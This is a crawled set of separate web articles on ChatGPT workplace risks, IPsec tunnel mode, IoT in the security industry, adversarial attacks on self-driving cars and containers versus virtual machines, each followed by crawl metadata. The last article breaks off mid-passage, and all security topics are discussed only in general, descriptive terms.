comprehensive look at APPN, a technology that might not be in widespread use today but nonetheless paved the way for many of the networking paradigms we take for granted.
<urn:uuid:7b9e527f-b360-4ff8-9165-80dee44d6d17>
CC-MAIN-2024-38
https://networkencyclopedia.com/advanced-peer-to-peer-networking-appn/
2024-09-19T01:49:25Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651944.55/warc/CC-MAIN-20240918233405-20240919023405-00196.warc.gz
en
0.936682
1,468
3.046875
3
ChatGPT, an advanced AI language model created by OpenAI, is gaining popularity for its ability to generate human-like responses to natural language input. 28 Feb 2023 ChatGPT, an advanced AI language model created by OpenAI, is gaining popularity and attention for its ability to generate human-like responses to natural language input. Trained on large amounts of data, ChatGPT's context comprehension and relevant response generation have made it a popular choice for businesses seeking to enhance customer experience and operations. Major technology corporations are making significant investments in Artificial Intelligence (AI). Microsoft, for instance, has declared that it will invest $10 billion in OpenAI and intends to merge ChatGPT into its Azure OpenAI suite. This will allow businesses to include AI assets, including DALL-E, a program that generates images, and Codex, which transforms natural language into code, in their technology infrastructure. While ChatGPT has several benefits for financial institutions, such as improving customer service and automating certain tasks, it also carries some risks that need to be addressed. Major banks and other institutions in the US have banned the use of ChatGPT within the organization. Concerns over sensitive information being put into the chatbot. Let's delve into the potential risks that are currently being debated regarding the use of ChatGPT: - Data Exposure: One potential risk of using ChatGPT in the workplace is the inadvertent exposure of sensitive data. For example, employees using ChatGPT to generate data insights and analyze large amounts of financial data could unknowingly reveal confidential information while conversing with the AI model, which could lead to breaches of privacy or security. Another known data exposure case observed is Employees could potentially expose private code if they inadvertently include confidential information in the training data. This could occur if an employee includes code snippets that contain sensitive data or proprietary information, such as API keys or login credentials. - Misinformation: ChatGPT can generate inaccurate or biased responses based on its programming and training data. Financial professionals should be cautious while using it to avoid spreading misinformation or relying on unreliable advice. ChatGPT’s current version was only trained on data sets available through 2021. In addition, the tool pulls online data that isn’t always accurate. - Technology Dependency: While ChatGPT offers useful insights for financial decision-making, relying solely on technology may overlook human judgment and intuition. Financial professionals may misunderstand ChatGPT's recommendations or become over-reliant on it. Thus, maintaining a balance between technology and human expertise is crucial. - Privacy Concerns: ChatGPT gathers a lot of personal data that users, unassumingly, might provide. Most AI models need a lot of data to be trained and improved, similarly, organizations might have to process a massive amount of data to train ChatGPT. This can pose a significant risk to individuals and organizations if the information is exposed or used maliciously. - Social Engineering: Cybercriminals can use ChatGPT to impersonate individuals or organizations and create highly personalized and convincing phishing emails, making it difficult for victims to detect the attack. This can lead to successful phishing attacks and increase the likelihood of individuals falling for the scam. - Creating malicious scripts and malware: Cybercriminals can train ChatGPT on vast amounts of code to produce undetectable malware strains that can bypass traditional security defenses. By using polymorphic techniques like encryption and obfuscation, this malware can dynamically alter its code and behavior, making it challenging to analyze and identify. - Financial institutions should establish clear policies and guidelines for using ChatGPT in the workplace to safeguard confidential information and mitigate the risks of data exposure. - Anonymized data should be used to train an AI model to protect the privacy of individuals and organizations whose data is being used. - Specific controls should be applied to how employees use information from ChatGPT in connection with their work. - Awareness training should be provided to Employees who have access to ChatGPT on the potential risks associated with the use of the technology, including the risks of data exposure, privacy violations, and ethical concerns. - Restricting access to ChatGPT will limit the potential for data exposure and misuse of the technology.
<urn:uuid:03245897-b27e-4794-90ab-c41ab95f24d9>
CC-MAIN-2024-38
https://www.ctm360.com/blogs/navigating-the-risks-of-chatgpt/
2024-09-19T02:01:59Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651944.55/warc/CC-MAIN-20240918233405-20240919023405-00196.warc.gz
en
0.930848
868
2.765625
3
Tunnel Mode is a method of sending data over the Internet where the data is encrypted and the original IP address information is also encrypted. The Encapsulating Security Payload (ESP) operates in Transport Mode or Tunnel Mode. In Tunnel Mode, ESP encrypts the data and the IP header information. The Internet Security (IPsec) protocol uses ESP and Authentication Header (AH) to secure data as it travels over the Internet in packets. ESP handles data encryption and some authentication of data. AH only provides authentication. Both protocols may be used independently or they may be grouped as IPsec. IPsec is used in virtual private networks (VPNs). “VPN connections are intended to conceal the source of the information being transmitted within the network and among its users. That’s why information carried this way uses ESP tunnel mode so the information itself and the IP header info are not visible.”
<urn:uuid:7c6bf2eb-794c-4338-ae10-93199fe66c9c>
CC-MAIN-2024-38
https://www.hypr.com/security-encyclopedia/tunnel-mode
2024-09-10T13:40:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651255.81/warc/CC-MAIN-20240910125411-20240910155411-00096.warc.gz
en
0.875201
186
3.8125
4
Ask a dozen people to explain the Internet of Things, and the odds are you’ll get a dozen different answers. One thing is certain, and that is putting the hyperbole to one side, the predicted phenomenon is coming. Some might argue that it has already arrived, albeit in an embryonic form. Here, with the assistance of leading providers in the security market, Benchmark considers the potential it offers to the security systems sector. [dropcap]W[/dropcap]hilst many people like to herald the Internet of Things (IoT) as a complex technological advance, the concept is actually quite simple. Indeed, rather than being a brave new world, it could be argued that it is simply an upgrade of current established M2M (machine to machine) communications. The core concept of IoT is the ability to connect devices. Whilst the accepted internet is a network of computers, predominantly with human operators, IoT brings smart devices into the mix. As an example, consider central heating in a residential application. Typically, a boiler will operate on a timer schedule, and heating levels will be set via temperature controller. Thermostatic valves will then regulate the output of individual radiators in order to maintain relatively consistent temperatures. In today’s world of mobile smart devices such as phones and tablets, internet connectivity, apps and automation, some level of control can be exercised over heating remotely by the home owner. So, how might IoT impact of this scenario? Connected temperature sensors – both internal and external – might be used to automatically control times when the boiler is operating, in accordance with pre-set thresholds. This would ensure consistent and comfortable temperatures without any interaction from the user. They still would be able to override the configurations. Connected automatic valves would even allow the adjustment of temperatures in specific rooms. Taking things a step further, the heating system could utilise shared data from, for example, a local weather forecasting station. This would enable automatic adjustments for changes in climate, including the occasional freak hot or cold days that the UK seemingly struggles with. Additionally, the heating system could share data with other household systems to create an accurate energy use record, and manufacturers of such devices are claiming energy savings of around 20 per cent where intelligent systems are deployed. This example only looks at a localised use of IoT technology. The potential for businesses and organisations using IoT is immense, especially when you consider national and international opportunities. The scope of IoT is enormous. Ranging from household devices and appliances, mobile systems, entertainment, through to IT systems, process machinery, building management, transportation and medicine, there isn’t a lot that won’t be covered as IoT spreads its footprint. Admittedly, in the early days, the security systems sector will only be interested in a few areas. The ability to interface with audio will open up a range of possibilities. Audio is increasing being seen as an essential element of security and business intelligence, and in truth security manufacturers haven’t been the best at audio delivery. IoT could allow connectivity to best-of-breed audio devices. Intelligent lighting control is another area that could benefit security. Whether this is in the form of lighting control when spaces are unoccupied, or the management of lighting for enhanced security, the options are manifold. When it comes to site management, elements such as electronic signage could offer benefits when connected with business intelligence solutions. For the security sector, it is not a case of struggling with the enormity of IoT, but selecting the right devices that can add value to security systems. How important are Open Platforms to IoT implementations? Justin Hollis, Marketing Manager, Samsung Techwin Europe Any manufacturer of electronic security solutions which buries its head in the sand and ignores the added value made possible by of the Internet of Things (IoT) is likely to have a limited future. The potential for IoT to deliver real life benefits to end-users will drive our industry’s innovators to capitalise on the opportunities, and those companies that don’t will find themselves left out in the cold at some point in the future. I joined Samsung Techwin Europe because I was excited about where the electronic security industry was going with open platform technology and the building blocks necessary to embrace IoT. However, it’s not good enough to simply say you have an open platform. It genuinely needs to be sufficiently flexible to interact with whatever hits it. Applications should not be restricted; they should be able to share video formats as well as event and alarm information and raw data, and true open platform devices should additionally have the flexibility to handle more than one application simultaneously. However, it is a question of timing. Although IoT is not new (the term was originally coined by British entrepreneur Kevin Ashton in 1999), from almost nowhere everyone now seems to be talking about it. Those who attended IFSEC 2015 will have noticed that the exhibition was buzzing with speculation and conjecture. I recently came from another technology sector (the mobile telephone industry), where the conversation is alight with the Internet of Things. That industry is currently caught up in the opportunity to link diverse elements together, but conversation mainly runs deep on the subject of data protection. The issues include who decides how data is shared between systems, and where is permission passed off between one platform and the next. Ironically, security runs at the heart of this conversation, but we are talking data security encryption with protocols, not surveillance. In this sector the conversation is advanced with all the usual protagonists like Google, Microsoft and Cisco engaged, but no one has yet answered how to ignite relevance of the Internet of Things to the consumer. After all, why should someone link their car to their fridge? As ever, the key to launching all new technologies lies in the B2B arena where the benefits can be easily understood and are certainly more tangible. It is a lot easier to convey the economics of convergence to an IT manager, as opposed to fickle convenience values for a consumer. For example, it would be relatively easy to generate interest when approaching a customer with the proposition to bring air-conditioning, lighting, surveillance and access into a single interface. Just think of the headcount resource savings. Just think about the management of only one system. It is very important to understand the potential value of machine-to-machine opportunities and prepare a product strategy accordingly. As a consequence, it is vital to have the most open platform language on the market to ensure that your own kernels of technology manage to interact with those of others. Without this kind of preparation in place, manufacturers may end up with the inability to interface and become irrelevant within the context of the future shape of the market. But herein lies the irony … none of it is relevant yet! In the meantime, customers can take advantage of the benefits offered by open platform technology, which until recently would have been regarded as ‘pie in the sky’. However, it is already delivering added value to customers by allowing them to tap into selective on-board data analytics. Partnerships with other sectors Mike Sussman, Technical Director, TDSi The Internet of Things (IoT) is being touted as the next big evolution in technology, with security being firmly included in its sphere of influence. Whilst there are huge potential benefits to be gained from having all these systems connected to one another, it is worth examining some of the issues that could stand in the way of complete and hassle-free integration. One of the key issues which continues to persist is a lack of shared technical knowledge between security providers and some other parties involved in IoT. Security is a complex and sometimes finely-balanced commodity which doesn’t necessarily lend its self well to outside influences, especially those which have little understanding of security protocols. There are many ‘hobbyist’ products that are available that can be used to perform simple tasks, such as opening car park barriers, and without knowledge of security or operational discussions risks can be introduced into the business. The obvious answer is for the various parties to share knowledge and training on how systems interact and the Operational Requirements (ORs). Whilst this works very well for commonly integrated systems (for example, a physical access control systems and a business database system), use of IoT could introduce any number of seemingly unrelated technologies that need to work together. The physical security sector has been quick to get up to speed with IP-based technology, something which has helped us move to integrated systems. Unfortunately this has not always been the case in reverse, with some IT providers being slower to catch up with the intricacies and benefits of integrating with physical security systems. Conversely, some installers and integrators do not understand the intricacies of IP configuration such as firewalls, VLANs and SSL which can also compromise security. Equally, the security industry will probably not understand the intricacies of all other IoT devices, so ensuring both sides work well together is a considerable challenge. Sometimes a lack of confidence on both sides can make true integration far more challenging. A badly integrated IoT element could actually compromise security systems. Generally most organisations are protected by Firewalls, but a connected IoT device may not uphold this level of end-point security. A simple IoT device could be used to perform a straightforward task, but there is no guarantee it will include SSL encryption. This would leave a relatively humble IoT device as a worryingly weak point in the security of an IP network. An IoT device could also be used to compromise security on an even wider level. Imagine something as humble as a refrigerator – something which could easily become part of an IoT network. It could monitor temperature or the space available inside, or even keep an inventory of the contents. All this data tells a lot about the users, from shopping habits to when they are in the building (or out of it). The system could be maliciously tampered with, with the intent of spoiling the contents (leading to food poisoning or even the destruction of stored medicines). Furthermore, if the refrigerator was used as a ‘back door’ to a business network, the targets could be even more serious. This might even include the device being used to compromise the integrated security system. The question of who is responsible for the components used in IoT is also a potential risk. In a typical business the different facets traditionally had specific owners: the IT department, the security team, etc.. However, IoT will see many areas of definition blur together and the responsibility for these crossover areas needs to be defined to ensure security and resilience of the business systems. This is made more complex when Bring Your Own Device (BYOD) systems join the mix. The security on an employee’s smart device is unlikely to match that of company assets, yet the access to restricted parts of the network will need to be the same and could represent a weak spot in security. Overall IoT promises to provide benefits for security, offering greater choice and options to customers, installers, integrators and manufacturers. It also brings potential risks which are by no means insurmountable, but do need the right consideration, planning and cooperation to ensure the benefits outweigh the risks. IoT and system infrastructure Neil Staley, Product Marketing Executive, Mayflex The Internet of Things (IoT) will have – in fact, is having – a massive effect on the infrastructure being used for security solutions. This is because the use of propriety infrastructure will become obsolete for systems that want to take advantage of the benefits of being part of the IoT. Structured cabling solutions that allow for TCP/IP and Ethernet will become the medium of choice. This will see an end to separate infrastructure for alarms, CCTV and access control. IoT really means true integration of systems; all systems will run on the network. Buildings will be designed with standards-compliant structured cabling solutions built into the very fabric of the structure. This will guarantee that the service required for the client will work, no matter what and where it is to be deployed. This future has already been seen and has started with the introduction of EN50173-6. The CENELEC standard, ‘EN50173-6 Information Technology – Generic cabling systems – Part 6: Distributed building services’, highlights how the future is going to look. The standard is readying the market for installing points for the network to be accessed. If end users want an IP-based access control solution, for example, the infrastructure will be close by to allow the service to be deployed. Once services, no matter what, are using the TCP/IP Ethernet protocol, they are ready and able to join the IoT. An ISO11801 structured cabling solution gives the ability to do that, so in that lays the answer. If the solution currently doesn’t use this type of system, then it will have to in the future if it wants to join the IoT party. Drivers for IoT adoption James Smith, Marketing Director, Wavestore Installers and systems integrators operating within the electronic security industry – as they have done in the past with other new waves of technology – are likely to view the Internet of Things (IoT) as an opportunity to generate new business, as well as providing their existing end-user customers with added benefit from their investment in video surveillance solutions. As more and more disparate devices and technologies become ‘smart’ and network-enabled, the possibilities for integration and creating highly useful solutions for end-users are practically limitless. The opportunity comes from the fact that we’re already able to do a lot with intelligence gathered from video and a host of other data sources, such as that obtained through analytics or even plain old ‘dumb’ sensors. The usefulness in combining video with data collected in real-time has very clear benefits and is being driven by advances in technology, open platform interoperability and reductions in cost. As an industry, we have the ability to clearly demonstrate these benefits and work with end-user customers to provide solutions that solve important business and operational problems. As with most technology, the IoT vision talked about by major world-leading technology companies seems like Utopia, and that is great as it sets a stage for discussion and drives innovation across the various industry sectors and markets. The challenge is that in practice, adoption will have to find its feet and interoperability will not be as simple as plug and play. As we know only too well from previous experiences, many different companies will adopt lots of different ways of doing things, and there will be a number of issues to overcome. Not least of these is the security of the actual devices themselves which, bearing in mind that our business is security, is a major consideration. Providing a flexible, open platform infrastructure that is able to embrace IoT is therefore incredibly important in facilitating these integrations over time; there will be many more devices from many more manufacturers that will have the capability of being part of the same solution, and this must be allowed for at an early stage. This will ensure that end-user customers can take advantage of the many opportunities that will be opened up in a way that protects their investment into the future as technology cycles play out. The good news is that the security industry already has experience of this as we are already doing it to a certain level. Today there are a myriad of integrations that speak different ‘languages’ to both hardware devices and software platforms in order to form seamless solutions. This proves that we are good at it as an industry, with robust, reliable operation at the core of what we are already able to provide. So, what can we expect into the future? We will definitely see greater integration between specialist devices and machines in order to create more deeply connected solutions. However, technology that is more personal to us in our daily lives, as well as technology that operates successfully in the consumer world, will undoubtedly start to augment our industry solutions to provide enhanced benefits to the end-user. Although we do not know exactly what the future holds, one thing is for sure: IoT widens the scope of what we, as an industry, will be able to deliver, but we must embrace it. The role of Open Platform VMS will be essential in bringing together specialist security systems with other devices and commonplace commodity items. This will enable the creation of seamless, secure, robust and reliable solutions that will make a positive difference to the end-customer and further increase the value of our industry. IoT and access control Tim Northwood, General Manager, Inner Range Europe Most LANS allow computers or other IP-enabled devices to make outgoing connections to the internet. However, LANS can present a major obstacle to incoming connections from the Internet, making the traditional process of enabling connectivity between devices located within a customer’s LAN and remote installer software a major headache for system integrators and other remote administrators. Firewalls and routers can cause major issues for security system integrators when working remotely via a LAN connection. For example, gaining access to ports and applications to complete routine system maintenance or conduct fault finding can result in lengthy negotiations with customers’ IT departments or having to regularly travel to site to carry out necessary work. When a LAN connection is the only choice, delivering a proactive remote service to support your customers security management systems can become complex and result in significant time wastage and escalating support costs, for both the integration company and customer. Pioneering security system manufacturers now offer secure cloud services that deliver hassle-free, highly secure connection of hardware and software over the internet. When accessing a system controller located on a customer’s LAN, system integrators gain the ability to securely access clients systems via the internet, without ever touching any routers or firewalls. The functionality of secure cloud services for IP connectivity is a game-changer for IoT interoperability within the access control market. Eliminating the need to connect to the internet via a LAN makes IP connectivity incredibly straightforward. For users, the key benefits of secure cloud services for IP connectivity include a reduction of wasted resource time granting remote access via LAN connections, a reassurance that IP access is totally secure, increased responsiveness of remote support to deliver fast and efficient resolution of any issues, and a reduction in the number and associated costs of system integrator visits to site for fault finding, training support and routine maintenance. There are also benefits for systems integrators. The approach simplifies the process of gaining remote access to security management systems, it ensures secure IP access without the need for a LAN connection, and enables responsive customer support service to quickly address security system issues and offer remote guidance for end users, thus creating a real competitive advantage for system integrators. In addition it can minimise the number of visits to customer sites, thereby reducing the overhead costs of support and maintenance, and gives the ability to conduct fault-finding remotely, identifying part requirements before leaving for site. IoT and reducing system complexity Peter Kim, Senior Director, IDIS The Internet of Things (IoT) has a rather loose definition and means many things to different people. In essence, you can define it as anything that communicates on the internet, so anything that has a unique ID can be seen as an IoT device. In terms of video surveillance, we tend to think of sensors or controllers, IP cameras, NVRs, etc.. IoT devices are good at doing simple things, such as sensors and controllers to manage building access, lighting and temperature, but to really create a value-added application, a system needs logic built into the back end. IoT seems straightforward enough, but its low power requirements and the limitations of computing power often prevent more sophisticated applications, and typically, the application logic is held in a back end server or an IoT hub. An NVR or VMS can be considered to be an IoT Hub, providing alarm and event history tagged to the video, while the data can be accessed from a remote network connection. However, such systems create complexity from the number of IP addressable devices. From a surveillance perspective, having a separate dedicated IP camera network decreases this complexity. Installers and operators only have to deal with one IP device: the NVR. The NVR hides the complexity of all its sub-devices and IP cameras. If you have 32 cameras, typically, you are looking at dealing with 32 IP cameras, a VMS (or an NVR) and a remote app PC. This translates to 34 IP addressable devices. However, with the right system, you would need only one NVR and one remote app PC. All the IP cameras would be hidden as everything is accessed via the NVR. This can reduce complexity. PSIM can be seen as an even bigger IoT Hub, but in most cases, PSIM systems require bespoke integration work, which can be costly and demand constant maintenance. For small to medium surveillance systems, an NVR will be a perfect fit to work as an IoT Hub for alarm I/O, motion detection, audio detection, video/audio, VA data, etc.. There is the development of a standard protocol for NVRs, ONVIF Profile G, but there is still a lot of work to be done. The role of NVRs will be crucial as an IoT Hub to reduce system complexity. IoT and small business applications Paul Routledge, Sales and Marketing Manager, D-Link UK Much of the hype surrounding the Internet of Things (IoT) is to do with its impact in the domestic sphere, particularly when it comes to home security which, after energy management, is the market most likely to be disrupted by the spread of IoT technology. That said, there are implications further up the scale for buyers of both corporate and small business security systems, with IoT likely to have an impact on enhanced support for mobile monitoring. Indirect remote access via on-site management consoles and NVRs has long been available to users of security systems. However, with the advent of IoT it becomes possible to not only connect to these more easily, but also to individual cameras, sensors and other remote security devices. Add local intelligence to those devices – along with email alerting plus custom smartphone and tablet apps – and IoT facilitates a new layer of visibility with huge potential value for business security users. This is likely to have an impact in the SMB market where users are more likely to be involved and take a hands-on approach to security, but it will also affect larger installations. Even where security is mostly outsourced it is important not to overlook the peace-of-mind value afforded by this kind of direct mobile overview. The second area where we expect IoT to have a major impact is in the proliferation of cloud-hosted Video Surveillance as a Service (VSaaS) solutions, which will increasingly start to replace local recording. A number of cloud-based VSaaS solutions are available already but the spread of IoT will enable complete security systems to be deployed merely by attaching cameras and other edge devices to the Internet. We don’t, however, expect rapid change. Whilst IoT will have a fairly immediate impact on home security – indeed, we’re seeing this already – traditionally cautious business buyers will need longer to understand the implications and potential benefits. IP surveillance is a fast-growing business. Research from IHS suggests the market for IP surveillance is growing at around 19.3 per cent a year and analogue video cameras are already being outsold by the IP equivalents for smaller businesses. However, it will be some time before larger businesses are prepared to embrace IoT, no matter what the hype promises. IoT and security delivery Frank Graham, Business Development Manager, Mobotix The Internet of Things (IoT) is a broad technology category that has gained a lot of interest in the last few years. According to research by Gartner, by 2020 there will be somewhere in the region of 25 billion IoT connected devices. However, other researchers and vendors make widely differing predictions, simply because the growth of certain use-cases is hard to predict. Growth is predicted to come from a number of areas including automotive, smart cities, manufacturing and related logistics processes. Another area where IoT is likely to have a major impact is in security. The successful transition towards IP as a security platform has proven a major advantage. In addition, sensors have started to switch to short range radio transmission and Wi-Fi standards. A large proportion of security systems are well placed to participate in an IoT ecosystem as internet access replaces dedicated lines to connect remote sites to monitoring centres. This process is further accelerated as propriety signalling protocols are replaced by IP-based options. Although hyped, IoT has some limitations in a security context. For example, wireless-based transmission can be problematic, while the shared nature of internet bandwidth can make it impractical for large scale video transfer and analysis. In some instances, organisations insist on closed networks for security. The proprietary nature of many systems, and the lack of internet accessibility, could be benefits when it comes to protecting systems from hackers. Yet there are areas where innovative thinking combined with IoT technology can unlock significant benefits and new security services: for example, linking door entry systems to smartphones to authorise remote entry is an easy-to-implement option. Other areas like in-camera analytics combined with people counting and beaconing technologies can be used for site security and to generate better insights into human behaviour. The key to unlocking these new use-cases is the deployment of flexible and open security systems that offer interfaces and methods of exchanging data that can be processed by other software applications. For the security industry, this means the adoption of emerging IoT protocols and wireless technologies that allow data from CCTV, alarm systems, access control and analytics systems to be successfully integrated by third party software. However, with extreme competition across the security sector, few vendors are investing in the R&D needed to unlock the potential. As other vendors within the security space start to follow this approach and embrace more open platforms, the potential for unlocking new exciting security applications will grow and allow the industry to share in the multi-billion dollar service revenues on offer.
<urn:uuid:f75796bd-d281-41ab-8dc9-e6057ddd8966>
CC-MAIN-2024-38
https://benchmarkmagazine.com/security-and-the-internet-of-things/
2024-09-12T23:06:32Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00796.warc.gz
en
0.954219
5,390
2.796875
3
By: Mavneet Kaur Self-driving automobiles, another name for autonomous cars, are capable of detecting their surroundings and navigating safely even when no person is present. This technology is a game-changer that might influence influencers and situations. Leading AI firms have already produced several self-driving automobiles. Because a completely driverless vehicle has yet to be made, autonomy is also a point of debate. Let’s look at the many levels at which these cars are configured to be self-driving. The autonomy of a vehicle can be characterized on six levels ranging from 0 to 5, as shown in Figure 1. No Automation: The vehicle is operated manually by people at this level, just like most cars today. Driver Assistance: This is the most prevalent kind of automation. The vehicle is equipped with a one-of-a-kind automated technology that assists the driver with tasks such as acceleration and steering. It is considered Level 1 since all other driving components, like as braking and Adaptive Cruise Control, which keeps the car at a safe distance from the following vehicle, are supervised by humans. Conditional Automation: Level 3 cars contain environmental sensing and decision-making capabilities, such as the ability to pass a slow-moving vehicle. They do, however, need human support. The Audi A8 is the world’s first mass-produced Level 3 car. High Automation: Level 4 cars can intervene if something goes wrong or the system fails. As a result, most scenarios do not require human interaction with these vehicles. A human may, however, manually override the mechanism. Level 4 cars, which operate entirely on electricity, are already being deployed by companies like NAVYA, Waymo, and Magna. Full Automation: Human assistance is not necessary at this level. There isn’t even a steering wheel on the cars. Geofencing will be removed, letting them go wherever they want and do anything a good human driver can. Many places throughout the world are testing fully autonomous vehicles, but none are yet available to the general public. So, what is causing the delay in making a fully automated car? Anything more than Level 2 is still a few years away in general manufacturing because of security, not because of technological competence. Vehicles have many physical safety features, such as seatbelts, airbags, and antilock brakes, but they don’t have nearly as many digital security safeguards. Connected vehicles aren’t yet ready for prime time for what’s required for safe performance in an online atmosphere. The main issue with self-driving automobiles is their safety. How can we verify that these computers comprehend the nuances of driving and that they will be able to deal with the endless variety of hitherto unknown events that they will undoubtedly encounter? To grasp the security issue, consider the technology utilized to create autonomous cars and how they contribute to security concerns. A deep learning system interprets data from the car’s array of sensors and adds to the vehicle’s high-level control in a self-driving automobile. Categorization of items surrounding the automobile is one component of the deep learning system, which allows it to safely travel and obey the laws of the road by distinguishing people, bicycles, traffic signs, and other objects. Deep learning enables a computer to see patterns in enormous amounts of data, which it can then make decisions. A deep learning system interprets data from the car’s array of sensors and adds to the vehicle’s high-level control in a self-driving automobile. Categorization of items surrounding the automobile is one component of the deep learning system, which allows it to safely travel and obey the laws of the road by distinguishing people, bicycles, traffic signs, and other objects. Unfortunately, researches have revealed that deep learning image categorization systems are highly defenseless to well-crafted adversarial attacks . It is possible to force a deep learning system to severely misinterpret a picture by adding a carefully determined noise to it. According to the “Safety First” industry consortium report , adversarial attacks to autonomous vehicles (AV) can pose significant security risks. The attacker causes tiny but consistent changes in crucial model layers such as filters and input in this form of attack, as seen in Figure 2. A stop sign can be mistaken for a slow down sign if noise is added, causing safety trouble. Although this layer of noise is hardly visible to the human eye, it can cause significant misinterpretation in crucial scene components such as road symbols and traffic lights. This might lead to colliding with other cars or people in the future. The most typical physical hostile attempts that might affect the vehicular system’s performance are stickers or paints on traffic signboards. Adversarial attacks can be categorized into two types. White box: The attacker has access to the model’s parameters in white-box attacks. Adversary customizes disturbances to a distinguished deep neural network, such as training data, architecture, and parameter values, in a white-box environment. Black box: In a black-box situation, the adversary understands next to nothing about the network. While white-box attacks have been investigated, they may be inaccessible to adversarial systems owing to the presence of numerous active variables, the most notable of which is sensor data. According to our state-of-the-art review, there is relatively little research on black-box hostile attacks. Is it, however, possible to tinker with the model at all times? In most situations, safety is jeopardized by external forces. Changing the physical environment rather than the vehicle’s perception of it is a significantly more viable method like in Figure 3. It is possible to fool a deep learning system into misclassifying road signs by tinkering with them, even while they are fully intelligible to people. With physical attacks, there are a number of new obstacles to contend with. There are so many separate ways to look at an object, any physical changes must still operate at various viewing angles and distances. Removing perturbations is a possibility for avoiding adversarial attacks, but it comes at a high cost. A more logical strategy would be to build machine learning systems resistant to these types of attacks, primarily by teaching them to detect hostile samples accurately. One of the drawbacks of adversarial attacks is that they frequently necessitate white-box models, which demand access to the model’s internal workings, such as particular parameters and architectures. Fortunately, autonomous car makers have heavily safeguarded these elements, making it extremely difficult for attackers to gain access to them in order to design their attacks. However, some ways can help make attacks less severe or models more practical, like training with perturbation , gradient masking , input regularisation , defense distillation , and feature squeezing . Future of self-driving automobiles and other challenges Fully self-driving automobiles appear to be a long way from reality due to security issues. While roadways are typically tidy and well-known places, what happens on them is everything from predictable. Humans are capable to steer, but they’re also clumsy and erratic at times. So, until all vehicles on the road are fully autonomous, every autonomous vehicle will have to be able to respond to edge situations as well as the myriad idiosyncrasies and tics that human drivers display on a regular basis. It’s the kind of thing we can swat away while driving without skipping a beat, but getting computers to attempt to control it is a significant matter. It will take a long time to transition from a few vehicles on the road to 100 percent autonomous vehicles, which will take a decade once completely autonomous automobiles that do not require human supervision are developed. - M. Wood, P. Robbel, D. Wittmann et al., “Safety first for automated driving,” 2019. [Online]. - C. Szegedy, W. Zaremba, I. Sutskever, J. Bruna, D. Erhan, I. Goodfellow, and R. Fergus, “Intriguing properties of neural networks,” in International Conference on Learning Representations, 2014. [Online]. - Tramer, Florian, and Dan Boneh. “Adversarial training and robustness for multiple perturbations.” arXiv preprint arXiv:1904.13000 (2019). - Goodfellow, Ian. “Gradient masking causes clever to overestimate adversarial perturbation size.” arXiv preprint arXiv:1804.07870 (2018). - Finlay, Chris, and Adam M. Oberman. “Scaleable input gradient regularization for adversarial robustness.” arXiv preprint arXiv:1905.11468 (2019). - Carlini, Nicholas, and David Wagner. “Defensive distillation is not robust to adversarial examples.” arXiv preprint arXiv:1607.04311 (2016). - Xu, Weilin, David Evans, and Yanjun Qi. “Feature squeezing: Detecting adversarial examples in deep neural networks.” arXiv preprint arXiv:1704.01155 (2017). - Holstein, Tobias, Gordana Dodig-Crnkovic, and Patrizio Pelliccione. “Ethical and social aspects of self-driving cars.” arXiv preprint arXiv:1802.04103 (2018). - Electric Vehicles: Future of Automobile Industry - Driving Status Modeling: From Detection to Prediction Cite this article Mavneet Kaur (2021), Self-Driving Cars and Adversarial Attacks, Insights2Techinfo, pp.1
<urn:uuid:849fdbbb-a182-4400-8acc-197d27d09804>
CC-MAIN-2024-38
https://insights2techinfo.com/self-driving-automobiles-and-adversarial-attacks/
2024-09-12T23:09:56Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00796.warc.gz
en
0.934879
2,035
3.3125
3
What Is Containerization? In the world of computing, containerization is a term that has gained huge attention and popularity in recent years. A container is a lightweight alternative to full machine virtualization, which involves encapsulating an application in an isolated operating environment, with all the files and libraries it needs to operate. Every containerized application can share the host system’s user space, while still maintaining its individual system processes, environment variables, and libraries. Containerization offers a range of benefits, including rapid deployment, portability, and scalability. It allows developers to create predictable environments that are isolated from other applications, reducing the risk of system instability or conflicts between applications. It also enables them to package their software with all of its dependencies, which can then be run on any system running a container engine, regardless of its specific configuration. Furthermore, containerization supports the microservices architecture, where applications are broken down into small, independent services. This approach allows for faster and more reliable deployment, and more effective management of complex applications. What Is Virtualization? Virtualization is a process of creating an abstraction layer over hardware, allowing a single computer to be divided into multiple virtual computers. Each of those virtual computers (known as “guests”) uses part of the hardware resources of the main computer (known as a “host”). The software used to achieve this is a hypervisor. Hypervisors run on a host operating system and enable multiple guest operating systems to run on top of it, sharing the same physical computing resources managed by the host operating system. In essence, this allows the physical computer to abstract the operating system and applications from the hardware. This is part of a series of articles about docker container. In this article: Containerization vs. Virtualization: Key Differences 1. Resource Overhead When comparing containerization vs virtualization in terms of resource overhead, containerization is the clear winner. Because containers share the host system’s operating system, and do not need to run a full operating system, they are significantly more lightweight and consume fewer resources. Virtual machines, on the other hand, each require their own OS, which increases the overhead, especially when many VMs are running on the same host system. 2. Startup Time In general, containers start up more quickly than VMs, because they don’t have to start up an entire operating system. Virtual machines take much longer to boot up. This means containers are more flexible and can be torn down and restarted whenever needed, supporting immutability, which means that a resource never changes after being deployed. Both containers and virtual machines offer a high degree of portability. However, containers have a slight edge because they package the application and all of its dependencies together into a single unit, which can be run on any system that supports the container platform. Virtual machines, while also portable, are more dependent on the underlying hardware. 4. Security Isolation In terms of security isolation, virtual machines have the advantage. Because each VM is completely isolated from the host system and other VMs, a security breach in one VM typically does not affect the others (although it is possible to compromise the hypervisor and take control of all VMs on the device). Containers, while isolated from each other, still share the host system’s OS, so a breach in one container could possibly leak to other containers. 5. Scalability and Management The lightweight nature and rapid startup time offered by containers make them ideal for scaling applications quickly and efficiently. They also lend themselves well to the microservices architecture, which can simplify the management of complex applications. Virtual machines, while also scalable, are more resource-intensive and take longer to start, making them less suitable for microservices and distributed applications. Related content: Read our guide to what is a container Use Cases for Virtualization Here are some of the main use cases of virtualization technology: In the world of software, legacy applications are often seen as a burden. These are applications that were built using older technologies and are typically difficult to maintain or upgrade. However, they are often critical to business operations and cannot simply be discarded. This is where virtualization shines. Virtualization allows these legacy applications to continue running on their original operating systems, even when the underlying hardware has been upgraded. This means that businesses can continue to use these applications without the need for expensive and time-consuming upgrades. Furthermore, virtualization provides a sandboxed environment, protecting the rest of the system 